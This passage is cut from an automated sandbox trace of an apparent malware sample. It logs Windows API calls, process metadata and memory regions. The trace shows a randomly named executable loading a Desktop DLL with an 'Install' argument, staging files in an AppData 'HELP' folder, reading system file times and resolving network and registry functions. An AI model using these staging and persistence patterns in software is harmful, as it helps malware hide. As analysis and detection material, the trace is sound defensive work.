(dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.132] GetLastError () returned 0x0 [0033.132] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.133] GetLastError () returned 0x0 [0033.133] SetLastError (dwErrCode=0x0) [0033.145] GetLastError () returned 0x0 [0033.145] SetLastError (dwErrCode=0x0) [0033.145] GetLastError () returned 0x0 [0033.145] SetLastError (dwErrCode=0x0) [0033.145] GetLastError () returned 0x0 [0033.145] SetLastError (dwErrCode=0x0) [0033.145] GetLastError () returned 0x0 [0033.145] SetLastError (dwErrCode=0x0) [0033.145] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.146] GetLastError () returned 0x0 [0033.146] SetLastError (dwErrCode=0x0) [0033.147] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.147] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.147] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f530 | out: lpSystemTimeAsFileTime=0x12f530*(dwLowDateTime=0xe179f670, dwHighDateTime=0x1d3dfba)) [0033.148] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f468, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.148] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f350, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetLastError () returned 0x0 [0033.148] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.149] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.149] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.149] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.149] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.149] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.149] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.149] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.149] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.149] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.149] GetLastError () returned 0xb7 [0033.149] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.149] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.149] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.149] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.149] wsprintfA (in: param_1=0x12f1d0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.149] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.149] wsprintfA (in: param_1=0x12f0cc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.149] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.149] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.149] CloseHandle (hObject=0x74) returned 1 [0033.150] GetLastError () returned 0x0 [0033.150] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.150] GetLastError () returned 0x0 [0033.150] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.150] GetSystemDirectoryA (in: lpBuffer=0x12f1d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.150] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.150] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.150] CloseHandle (hObject=0x74) returned 1 [0033.151] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.151] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.151] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.152] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.152] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.153] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.153] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.153] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.153] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.153] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.153] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.154] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.154] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.154] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.154] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.155] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.155] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.155] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.155] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.155] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.155] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.155] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.155] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.155] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.157] HeapDestroy (hHeap=0x1180000) returned 1 Process: id = "32" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fa60" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1475 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1476 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1477 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1478 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1479 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1480 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1481 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1482 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1483 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1484 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1485 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1486 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1487 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1488 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1489 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1490 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1491 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1492 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1493 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1494 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1495 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1496 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1497 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1498 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1499 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1500 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1501 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1502 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1503 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1504 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1505 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1506 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1507 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1508 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1509 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1510 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1511 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1512 start_va = 0x1200000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1513 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1514 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1515 start_va = 0x1200000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1516 start_va = 0x1380000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 2971 start_va = 0x1480000 end_va = 0x157ffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 2972 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 70 os_tid = 0xbd4 [0033.317] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f79c | out: lpSystemTimeAsFileTime=0x26f79c*(dwLowDateTime=0xe18aa010, dwHighDateTime=0x1d3dfba)) [0033.317] GetCurrentProcessId () returned 0xbd0 [0033.317] GetCurrentThreadId () returned 0xbd4 [0033.317] GetTickCount () returned 0x17770 [0033.317] QueryPerformanceCounter (in: lpPerformanceCount=0x26f794 | out: lpPerformanceCount=0x26f794*=366906657) returned 1 [0033.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.318] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.318] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.318] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.318] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.318] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.319] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.319] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.319] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.319] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.319] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.319] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.320] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.320] GetProcAddress (hModule=0x761d0000, 